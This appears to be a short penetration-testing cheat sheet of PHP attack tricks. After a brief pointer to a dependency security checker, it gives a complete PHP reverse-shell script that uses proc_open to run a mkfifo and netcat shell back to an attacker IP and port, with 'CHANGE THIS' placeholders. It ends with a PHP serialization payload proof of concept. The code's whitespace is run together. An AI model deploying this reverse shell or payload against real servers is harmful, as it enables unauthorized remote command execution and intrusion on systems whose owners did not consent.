A list of PHP tricks & vulnerabilities and their application.
Local PHP Security Checker
The Local PHP Security Checker is a command line tool that checks if your PHP application depends on PHP packages with known security vulnerabilities. It uses the Security Advisories Database behind the scenes.
Local PHP Security Checker: https://github.com/fabpot/local-php-security-checker
proc_open() function
You can get a reverse shell from the proc_open() php function using the following script.
<?phpset_time_limit (0);$ip ='10.10.10.10'; // CHANGE THIS$port =4444; // CHANGE THIS// Spawn shell process$descriptorspec =array(0=>array("pipe","r"),// stdin is a pipe that the child will read from1=>array("pipe","w"),// stdout is a pipe that the child will write to2=>array("file","/tmp/error-output.txt","a") // stderr is a pipe that the child will write to);$cwd ="/tmp";$env =array('some_option'=>'aeiou');$process =proc_open('sh', $descriptorspec, $pipes, $cwd, $env);if (is_resource($process)) {fwrite($pipes[0],'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f');fclose($pipes[0]);echostream_get_contents($pipes[1]);fclose($pipes[1]); $return_value =proc_close($process);echo"command returned $return_value\n";}?>
When PHP safe_mode is enabled, you can bypass it using the proc_open() function.
<?phpnamespaceApp\Service;classLogger{private $log_me;function__construct($log_me) {$this->log_me = $log_me; }}echobase64_encode( serialize(newLogger("echo 'hello from the other side' > /tmp/poc_unserialize")));
